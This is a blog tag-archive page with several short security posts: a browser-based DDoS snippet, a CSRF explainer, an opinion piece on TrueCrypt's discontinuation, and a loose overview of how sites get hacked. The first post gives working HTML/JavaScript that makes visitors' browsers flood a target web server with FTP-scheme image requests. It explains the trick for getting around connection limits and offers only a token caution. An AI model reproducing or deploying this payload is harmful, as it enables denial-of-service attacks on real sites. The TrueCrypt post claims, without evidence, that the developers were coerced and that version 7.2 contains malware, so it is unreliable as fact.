Tag Archives: security

Javascript apache ddos

Posted on by
Reply

Something quick to share with you before I forget it 🙂

<html><body>
<script>
       for (var i = 0; i < 100; i++) {
             var img = new Image();
             var url = 'ftp://victim.com:80/?'+i;
             img.src = url;
       }
</script>
</body></html>

I use ftp because http has a limit of 6 simultaneous connections on most browsers, on the other hand ftp has no limit to the day I write this post.

Be sane on how you use it!!!

(Original attack demonstration on BlackHat 2013, Las Vegas)

CSRF attack

Posted on by
Reply

It’s been long since the last time I blogged but some things I took on were very time-consumptive, today we’ll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. It can damage your bank account balance, it acts on your behalf on your website activities without your consent or you even knowing about it until it’s very late.

However, if a website has taken precautions about this type of attack such as CSRF one-time tokens, it’s renders the attack completely harmless because the web server will not accept the requests sent by 3rd parties.

For more details one good article I spotted is on: https://www.acunetix.com/websitesecurity/csrf-attacks/

Aimilios

 

TrueCrypt no longer supported

Posted on by
Reply

Hello fellow security conscious citizens of the Internet!

On the 24th of May 2014 the TrueCrypt Organization stopped the support and development of its industry leading encryption project called “TrueCrypt” which provided powerful encryption to thousands of computers claiming to have done that because Microsoft stopped windows XP support.

Well that’s bollocks if you ask me 🙂

Governmental agencies probably found these so called “anonymous” developers and either bribed or forced them to stop the development of TrueCrypt as it stonewalled governments from obtaining digital data and building cases against criminals, or they were bought off, what ever the scenario I highly doubt anyone with an average IQ believes the official statement of TrueCrypt.

Now the important things, alternatives to TrueCrypt? Many many many of them, so there’s no need to worry, just migrate from TrueCrypt to a similar OPEN-SOURCE application, similar to TrueCrypt is the DiskCryptor.

WARNING: In my opinion don’t even run or install TrueCrypt 7.2 because I believe it contains malware that could expose your data to 3rd parties that had to do with this security scandal.

Can my site be hacked?

Posted on by
1

The answer is yes, but lets clear some things below.

First of all in order to be hacked the hacker has to find vulnerabilities which takes some time, which rarely would spend if you are not a target. Everything can be hacked.

Usual vulns/hacks/backdoors.

Usually the hackers are searching for php vulnerabilities in the code your site is running, either is some popular CMS you downloaded or your custom php code by you or the company created your site. Some php penetration examples are SQL injection, using $_POST and $_GET commands to their favor.

Most sites are hosted in shared computers which doesn’t nesseccerily means I’m not careful they can your site through mine, but happens from time to time depending how secure and independent your account is, shared computer doesn’t always mean linked configs. They did in the past, now most companies they don’t allow global configs, each account has its own safety configuration & settings.

A backdoor can be anything, an email you misplaced in your server or something entirely different, for example a plugin your installed on your wordpress or joomla or drupal or else!

The favorite attack is DDOS (Denial of service attack) which sends more packets to your IP than your connection can download as a result slowing your site temporarily or shuts it down at completely to the web. Of course is accessible through some advanced panels or local connections. There are certain ways to protect your from DDOS such as software, firewalls or in some cases like banks, organizations like NASA, agencies etc hardware. Note this: Nothing can protect you from 100.000.000 zombie computers attacking your network, even CIA has been DDOSed and went off for a day.

Thats for today!